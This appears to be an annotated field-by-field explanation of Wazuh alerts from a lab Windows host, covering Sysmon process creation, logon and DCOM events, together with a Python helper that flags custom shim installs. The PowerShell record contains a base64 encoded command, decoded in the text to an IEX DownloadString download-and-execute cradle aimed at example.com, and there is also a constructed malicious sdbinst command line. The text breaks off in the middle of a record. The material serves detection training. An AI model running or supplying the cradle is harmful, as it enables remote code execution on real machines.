data.win.system.keywords: 0x8000000000000000 Keyword bitmask. Only the reserved top bit is set, as on all Sysmon events; nothing to filter on here.
data.win.system.systemTime: 2025-04-24T22:50:26.9576523Z Time Windows wrote the event, UTC. Compare with UtcTime in the message (the actual process start); a few milliseconds apart is normal.
data.win.system.eventRecordID: 345991 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the Sysmon service that logged the event, not the process being reported (that is ProcessId in the message).
data.win.system.threadID: 4740 Sysmon's logging thread; only deep forensics cares.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the record came from: Sysmon's own log.
data.win.system.computer: Attacker Computer name Windows stamped on the record. Should equal agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:50:26.949
ProcessGuid: {94294ddc-c032-680a-c10c-000000000e00}
ProcessId: 12176
Image: C:\Windows\System32\sdbinst.exe
FileVersion: 10.0.26100.3624 (WinBuild.160101.0800)
Description: Application Compatibility Database Installer
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: sdbinst.exe
CommandLine: C:\WINDOWS\System32\sdbinst.exe -m -bg
CurrentDirectory: C:\WINDOWS\system32\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=D4646168E6E81A16CA2EB703CFE133DED7C3FD8626696AA3CB2A4425E0E54F1D
ParentProcessGuid: {94294ddc-ea9e-67fe-9c00-000000000e00}
ParentProcessId: 5424
ParentImage: C:\Windows\System32\svchost.exe
ParentCommandLine: C:\WINDOWS\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
ParentUser: NT AUTHORITY\SYSTEM" Full Sysmon process-creation record. Read Image, CommandLine, User and the Parent* fields together: sdbinst.exe -m -bg started by the PcaSvc (Program Compatibility Assistant) svchost as SYSTEM is Windows' own compatibility-database maintenance and the usual false positive for this rule. The T1546.011 case worth hunting is sdbinst pointed at a custom .sdb file, typically from a user-context parent such as cmd.exe or an installer.
data.win.eventdata.utcTime: 2025-04-24 22:50:26.949 Process start time, UTC, as Sysmon recorded it.
data.win.eventdata.processGuid: {94294ddc-c032-680a-c10c-000000000e00} Sysmon's own process GUID. Unique across reboots and PID reuse, so it is the key for joining this to later events (network, file, registry) from the same process.
data.win.eventdata.processId: 12176 PID of the new process. PIDs are reused after exit, so prefer processGuid for joins.
data.win.eventdata.image: C:\\Windows\\System32\\sdbinst.exe Full path of the executable. Backslashes are doubled because the field is JSON-escaped.
data.win.eventdata.fileVersion: 10.0.26100.3624 (WinBuild.160101.0800) PE version resource (26100 = Windows 11 24H2). Metadata, easily forged; confirm with the hash.
data.win.eventdata.description: Application Compatibility Database Installer PE description string from the version resource.
data.win.eventdata.product: Microsoft® Windows® Operating System PE product string.
data.win.eventdata.company: Microsoft Corporation PE company string. Cosmetic, not a signature check.
data.win.eventdata.originalFileName: sdbinst.exe Name compiled into the binary. Differs from image when a binary was renamed to dodge name-based rules.
data.win.eventdata.commandLine: C:\\WINDOWS\\System32\\sdbinst.exe -m -bg Full command line. -m -bg with no database path is the PcaSvc maintenance form; an explicit .sdb path is what a shim install looks like.
data.win.eventdata.currentDirectory: C:\\WINDOWS\\system32\\ Working directory at start. A user or temp folder here would be out of character for the child of a SYSTEM service.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM Account the process runs as.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} Sysmon GUID for the logon session; joins to other process events in the same session.
data.win.eventdata.logonId: 0x3e7 Windows logon session ID. 0x3e7 (999) is always the SYSTEM session; joins to the Logon ID in Security 4624/4672/4688.
data.win.eventdata.terminalSessionId: 0 Terminal session: 0 = services session (no interactive user), 1 and up = logged-on desktops.
data.win.eventdata.integrityLevel: System Token integrity level: Low, Medium (standard user), High (elevated admin), System.
data.win.eventdata.hashes: SHA256=D4646168E6E81A16CA2EB703CFE133DED7C3FD8626696AA3CB2A4425E0E54F1D Hash of the on-disk image. Compare against your golden-image inventory or a reputation service; an unknown hash under a System32 path is a masquerade until proven otherwise.
data.win.eventdata.parentProcessGuid: {94294ddc-ea9e-67fe-9c00-000000000e00} Sysmon GUID of the parent. Search it to find the parent's own Event 1 and its other children.
data.win.eventdata.parentProcessId: 5424 PID of the parent at the time of launch.
data.win.eventdata.parentImage: C:\\Windows\\System32\\svchost.exe Parent executable. svchost is only meaningful together with the -s service name in its command line.
data.win.eventdata.parentCommandLine: C:\\WINDOWS\\system32\\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc Parent command line. -s PcaSvc names the hosted service (Program Compatibility Assistant), the legitimate launcher of sdbinst -m -bg.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM Account the parent runs as. SYSTEM parent with SYSTEM child is expected; a SYSTEM child under a user-context parent is the escalation pattern.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
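A triage helper for this rule, added here as an example and not part of the page, of Wazuh or of Sysmon: it parses the Sysmon "Key: Value" message body into a dict and separates the PcaSvc maintenance run recorded above from the shim-install shape that T1546.011 describes. The benign criteria (svchost -s PcaSvc parent, SYSTEM, exactly -m -bg, no database path) are taken from the event above; the counter-example event, its user and its .sdb path are constructed for illustration.

```python
import re
from typing import Dict

# Sysmon event 1 message from the alert above, abridged to the fields the
# triage below reads (real values from the page, not constructed).
PCA_MAINTENANCE_EVENT = r"""Process Create:
RuleName: -
UtcTime: 2025-04-24 22:50:26.949
ProcessId: 12176
Image: C:\Windows\System32\sdbinst.exe
CommandLine: C:\WINDOWS\System32\sdbinst.exe -m -bg
User: NT AUTHORITY\SYSTEM
IntegrityLevel: System
ParentImage: C:\Windows\System32\svchost.exe
ParentCommandLine: C:\WINDOWS\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
ParentUser: NT AUTHORITY\SYSTEM"""

# Constructed counter-example: the shape an attacker-installed shim takes.
# Host, user, parent and .sdb path are made up for illustration.
CUSTOM_SHIM_EVENT = r"""Process Create:
RuleName: -
UtcTime: 2025-04-24 23:01:00.000
ProcessId: 4242
Image: C:\Windows\System32\sdbinst.exe
CommandLine: sdbinst.exe -q C:\Users\user1\AppData\Local\Temp\update.sdb
User: WORKSTATION\user1
IntegrityLevel: High
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: "C:\Windows\System32\cmd.exe"
ParentUser: WORKSTATION\user1"""


def parse_sysmon_message(message: str) -> Dict[str, str]:
    """Turn Sysmon's 'Key: Value' message body into a dict.

    The first line ('Process Create:') is the event title and is skipped.
    Splitting on the first ': ' keeps drive letters such as 'C:\\...' intact.
    """
    fields: Dict[str, str] = {}
    for line in message.splitlines()[1:]:
        key, sep, value = line.partition(": ")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


# A .sdb argument, optionally quoted; the legitimate shim store under %SystemRoot%.
SDB_ARG = re.compile(r'"?([^\s"]+\.sdb)"?', re.IGNORECASE)
APPPATCH_DIR = re.compile(r"^[a-z]:\\windows\\apppatch\\", re.IGNORECASE)
# Strips the leading executable token (quoted or bare) from a command line.
LEADING_IMAGE = re.compile(r'^(?:"[^"]*"|\S+)\s*')


def classify_sdbinst(fields: Dict[str, str]) -> str:
    """Separate PcaSvc's routine sdbinst run from a shim install worth a ticket."""
    image = fields.get("Image", "").lower()
    if not image.endswith("\\sdbinst.exe"):
        return "not_sdbinst"

    args = LEADING_IMAGE.sub("", fields.get("CommandLine", "")).strip()
    user = fields.get("User", "").upper()
    parent_image = fields.get("ParentImage", "").lower()
    parent_cmd = fields.get("ParentCommandLine", "").lower()

    # Benign baseline seen on the page: the Program Compatibility Assistant
    # service host running sdbinst -m -bg as SYSTEM with no database path.
    pca_parent = parent_image.endswith("\\svchost.exe") and "-s pcasvc" in parent_cmd
    if args.lower() == "-m -bg" and user == "NT AUTHORITY\\SYSTEM" and pca_parent:
        return "benign_pca_maintenance"

    # T1546.011 shape: an explicit .sdb outside Windows' own AppPatch store.
    sdb = SDB_ARG.search(args)
    if sdb and not APPPATCH_DIR.match(sdb.group(1)):
        return "suspicious_custom_shim"

    # Anything else (-m -bg from an odd parent, an AppPatch .sdb, unknown
    # switches) is unusual but not conclusive on this event alone.
    return "review"


if __name__ == "__main__":
    for label, raw in (("page event", PCA_MAINTENANCE_EVENT), ("constructed", CUSTOM_SHIM_EVENT)):
        print(f"{label}: {classify_sdbinst(parse_sysmon_message(raw))}")
```

When the result is suspicious_custom_shim, the follow-up is on the host rather than in the SIEM: installed databases are recorded under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom and \InstalledSDB, and sdbinst copies the .sdb into %SystemRoot%\AppPatch\Custom, so both locations tell you which executable was shimmed and to what.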
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535292.2657390 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing ETW provider that wrote the event: the Security audit subsystem. Event IDs are only unique per provider, so read this with eventID.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} GUID of the Security-Auditing provider. Stable across renames and language packs, the safer key for filters and rules.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 Version of the event's XML template. Newer 4624 versions added fields such as Elevated Token and Virtual Account, so parsers written for old versions miss them.
data.win.system.level: 0 Severity level. Security audit events are logged at 0 (LogAlways); success versus failure is carried in the keywords instead.
data.win.system.task: 12544 Windows task category. 12544 = Logon (also used by 4625 and 4648).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Keyword bitmask. 0x0020000000000000 is Audit Success; Audit Failure is 0x0010000000000000. The quickest success/failure filter across all Security events.
data.win.system.systemTime: 2025-04-24T22:54:09.8291801Z Time Windows wrote the event, UTC. Order timelines by this, not by the alert id.
data.win.system.eventRecordID: 43993 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 PID of the logging process (LSASS, the audit subsystem), not the process that requested the logon; that one is Process ID in the message.
data.win.system.threadID: 9532 LSASS thread that logged the record; only deep forensics cares.
data.win.system.channel: Security Event log channel the record came from. The Security log is readable only by administrators and the Event Log Readers group.
data.win.system.computer: Attacker Computer name Windows stamped on the record. Should equal agent.name.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." Rendered 4624 text. The fields that matter are Logon Type 5 (service start), New Logon = SYSTEM and Process Name services.exe: the Service Control Manager starting a service as LocalSystem, which happens constantly on every Windows host. Everything after the Key Length line is Microsoft's fixed explanatory boilerplate, identical in every 4624.
data.win.eventdata.subjectUserSid: S-1-5-18 SID of the account that requested the logon. S-1-5-18 is LOCAL SYSTEM.
data.win.eventdata.subjectUserName: ATTACKER$ Requesting account name. The trailing $ marks the computer account, which is how SYSTEM appears on a non-domain host.
data.win.eventdata.subjectDomainName: WORKGROUP Domain of the requester. WORKGROUP means this host is not domain-joined.
data.win.eventdata.subjectLogonId: 0x3e7 Logon session of the requester. 0x3e7 (999) is the fixed SYSTEM session.
data.win.eventdata.targetUserSid: S-1-5-18 SID of the account that was logged on: again LOCAL SYSTEM.
data.win.eventdata.targetUserName: SYSTEM Account that was logged on.
data.win.eventdata.targetDomainName: NT AUTHORITY Domain of the new logon. NT AUTHORITY is the well-known authority for built-in accounts.
data.win.eventdata.targetLogonId: 0x3e7 New logon session ID. Join it to Logon ID in 4672 (special privileges), 4688 (process creation) and Sysmon LogonId to see what the session did.
data.win.eventdata.logonType: 5 Logon type. 5 = Service (services.exe starting a service). Others to know: 2 interactive, 3 network (SMB, WinRM), 4 batch, 7 unlock, 9 NewCredentials (runas /netonly), 10 RemoteInteractive (RDP), 11 cached credentials.
data.win.eventdata.logonProcessName: Advapi Logon process. Advapi means a local caller used LogonUser() (services, scheduled tasks, runas) rather than a network listener.
data.win.eventdata.authenticationPackageName: Negotiate Auth package. Negotiate picks Kerberos when available and falls back to NTLM; for a local SYSTEM service logon no network authentication actually takes place.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} All zeros = no Kerberos ticket involved. A real GUID here lets you join this event to 4768/4769 on the domain controller.
data.win.eventdata.keyLength: 0 Session key length in bits. 0 means no session key was requested, which is normal for local and service logons like this one; the value is only meaningful on network logons and is not by itself a downgrade indicator.
data.win.eventdata.processId: 0x304 PID (hex) of the process that requested the logon. 0x304 = 772 here.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe Requesting process: the Service Control Manager, which is exactly who should create type-5 logons. Any other process creating them deserves a look.
data.win.eventdata.impersonationLevel: %%1833 Unresolved message-table string ID; the rendered message above shows it as Impersonation (the process can impersonate the client on the local system).
data.win.eventdata.virtualAccount: %%1843 Unresolved message-table string ID; rendered above as No (not a virtual service account).
data.win.eventdata.targetLinkedLogonId: 0x0 Paired UAC session for split-token interactive logons. 0x0 because SYSTEM has no filtered twin.
data.win.eventdata.elevatedToken: %%1842 Unresolved message-table string ID; rendered above as Yes (full, unfiltered token).
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Windows System error event Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 61102 Numeric ID of the detection rule that fired.
rule.firedtimes: 6 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_system', 'system_error'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gpg13: ['4.3'] UK GPG13 (Good Practice Guide 13, protective monitoring) control the rule maps to. A compliance tag, not a severity.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535294.2664727 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-DistributedCOM ETW provider that wrote the event: the DCOM runtime. Event IDs are only unique per provider, so read this with eventID.
data.win.system.providerGuid: {1B562E86-B7AA-4131-BADC-B6F3A001407E} GUID of that provider. Stable across renames and language packs, the safer key for filters and rules.
data.win.system.eventSourceName: DCOM Legacy event-log source name, present only when a classic (non-manifest) provider wrote the record.
data.win.system.eventID: 10010 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 Version of the event's XML template.
data.win.system.level: 2 Severity level: 2 = Error (1 Critical, 3 Warning, 4 Informational, 5 Verbose). The error level is what rule 61102 keys on; the content is still routine.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8080000000000000 Keyword bitmask. Includes the Classic bit (0x0080000000000000) set on legacy System-log events; nothing event-specific to filter on.
data.win.system.systemTime: 2025-04-24T22:54:50.1356572Z Time Windows wrote the event, UTC.
data.win.system.eventRecordID: 3069 Incremental log record number – handy for timeline order.
data.win.system.processID: 336 PID of the logging process (the RPCSS/DCOM service host), not the COM server that failed to register.
data.win.system.threadID: 17180 Thread inside that process; only deep forensics cares.
data.win.system.channel: System Event log channel the record came from.
data.win.system.computer: Attacker Computer name Windows stamped on the record. Should equal agent.name.
data.win.system.severityValue: ERROR TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "The server {8CFC164F-4BE5-4FDD-94E9-E2AF73ED4A19} did not register with DCOM within the required timeout." Rendered message. DCOM 10010 means a COM server launched on demand did not register its class object in time, usually a slow, crashed or uninstalled component. Resolve the CLSID under HKCR\CLSID (and its AppID) to name the owner before treating it as more than noise; alone it is not an attack indicator.
data.win.eventdata.param1: {8CFC164F-4BE5-4FDD-94E9-E2AF73ED4A19} The CLSID from the message: the only variable part of event 10010 and the value to pivot on.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 113 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535326.2666249 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event. Event IDs are only unique per provider: Sysmon 1 is process creation, not the Security log's 4688.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} GUID of the Sysmon provider. Stable across renames and language packs, so it is the safer key for filters and rules.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 Version of the event's XML template (the Sysmon event 1 schema).
data.win.system.level: 4 Severity level: 4 = Informational. Sysmon logs everything at this level; the risk is in the fields, not the level.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Keyword bitmask. Only the reserved top bit is set, as on all Sysmon events; nothing to filter on here.
data.win.system.systemTime: 2025-04-24T22:55:23.7159287Z Time Windows wrote the event, UTC. About 1.7 s after UtcTime in the message here; Sysmon batches writes under load, so use UtcTime for the process start.
data.win.system.eventRecordID: 350093 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the Sysmon service that logged the event (same as in the sdbinst record above), not the process being reported.
data.win.system.threadID: 4740 Sysmon's logging thread; only deep forensics cares.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the record came from: Sysmon's own log.
data.win.system.computer: Attacker Computer name Windows stamped on the record. Should equal agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:55:21.968
ProcessGuid: {94294ddc-c159-680a-cb0c-000000000e00}
ProcessId: 14568
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bbde-680a-d909-000000000e00}
ParentProcessId: 14832
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ParentUser: Attacker\Attcker1" Full Sysmon record. An interactive powershell.exe (no arguments, session 1, Medium integrity) relaunched itself with -NoLogo -NoProfile -EncodedCommand, the pattern rule 92057 keys on. Decode the argument before judging it: it is base64 over UTF-16LE and here yields IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'), a download-and-execute cradle, pointed in this lab at the reserved example.com domain.
data.win.eventdata.utcTime: 2025-04-24 22:55:21.968 Process start time, UTC, as Sysmon recorded it.
data.win.eventdata.processGuid: {94294ddc-c159-680a-cb0c-000000000e00} Sysmon's own process GUID, unique across reboots and PID reuse. Search it to find this process's network connections (Event 3) and file writes (Event 11).
data.win.eventdata.processId: 14568 PID of the new process. PIDs are reused after exit, so prefer processGuid for joins.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Full path: Windows PowerShell 5.1, the built-in host. Backslashes are doubled by JSON escaping.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) PE version resource. Metadata, easily forged; confirm with the hash.
data.win.eventdata.description: Windows PowerShell PE description string from the version resource.
data.win.eventdata.product: Microsoft® Windows® Operating System PE product string.
data.win.eventdata.company: Microsoft Corporation PE company string. Cosmetic, not a signature check.
data.win.eventdata.originalFileName: PowerShell.EXE Name compiled into the binary. Matches image here; a renamed copy would still show PowerShell.EXE, which is why rules should key on this field as well as on image.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Full command line, JSON-escaped (\" and \\). -EncodedCommand takes base64 of the UTF-16LE script; this one decodes to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'). Alert on the switch and its short forms (-e, -ec, -enc) and always decode before triage.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ Working directory: the user's profile, consistent with an interactive console.
data.win.eventdata.user: Attacker\\Attcker1 Account the process runs as. A local account: on a non-domain host the computer name stands in for the domain.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} Sysmon GUID for the logon session; joins to the other processes this user ran in the same session.
data.win.eventdata.logonId: 0x26584 Windows logon session ID. Join it to Logon ID in Security 4624 to see how the session was created, and to 4688 for its other processes.
data.win.eventdata.terminalSessionId: 1 Terminal session 1 = the first interactive desktop, so a human, or something driving their session, ran this.
data.win.eventdata.integrityLevel: Medium Token integrity Medium = standard, non-elevated user. Whatever the cradle fetches runs with user rights unless it escalates.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC Hash of the on-disk powershell.exe, which should match the signed Windows binary. The payload itself never touches disk; that is the point of a cradle.
data.win.eventdata.parentProcessGuid: {94294ddc-bbde-680a-d909-000000000e00} Sysmon GUID of the parent PowerShell. Find its own Event 1 to learn who or what opened that console (explorer.exe, cmd.exe, a scheduled task, an RDP session).
data.win.eventdata.parentProcessId: 14832 PID of the parent at the time of launch.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Parent is also powershell.exe; PowerShell spawning PowerShell is what the rule description means.
data.win.eventdata.parentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" Parent command line: a bare interactive console with no arguments.
data.win.eventdata.parentUser: Attacker\\Attcker1 Account the parent runs as. Same user as the child, so no privilege change between them.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first and treat it as the alert's headline, then check targetFilename before escalating: here the "executable" is a .ps1 in the user's %TEMP% that PowerShell itself writes at start-up, so the T1105 mapping is the rule's guess, not evidence of a transfer. The real finding is the PowerShell instance that created the file.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 117 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535327.2673135 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event. This is Sysmon, not the Security log, so the event IDs below use Sysmon's numbering.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} GUID of the Sysmon provider. Stable across hosts; filter on it when the provider name is missing.
data.win.system.eventID: 11 Sysmon event ID, not a Security-log ID like 4624 or 4688. 11 = FileCreate: a process created or overwrote a file matching the Sysmon config's FileCreate filter.
data.win.system.version: 2 Schema version of this event type. If fields go missing after a Sysmon upgrade, the decoder needs updating for the new version.
data.win.system.level: 4 Event level: 4 = Informational. Sysmon logs everything at this level, so severity has to come from the Wazuh rule, not from here.
data.win.system.task: 11 Task category. For Sysmon it mirrors the event ID (11 = File created).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:55:24.7769762Z When the record was written to the event log, in UTC. Compare with UtcTime in the message; a gap of more than a few hundred milliseconds means the host was under load or logging was delayed.
data.win.system.eventRecordID: 350094 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the Sysmon service that wrote the record, not of the process being reported. The monitored process is ProcessId in the message.
data.win.system.threadID: 4740 Thread inside the Sysmon service that wrote the record. Same caveat as processID.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the record lives in. The Wazuh agent's localfile configuration must subscribe to it or no Sysmon events arrive.
data.win.system.computer: Attacker Hostname recorded by the event log itself. Should match agent.name; if it does not, the agent is forwarding another host's logs.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
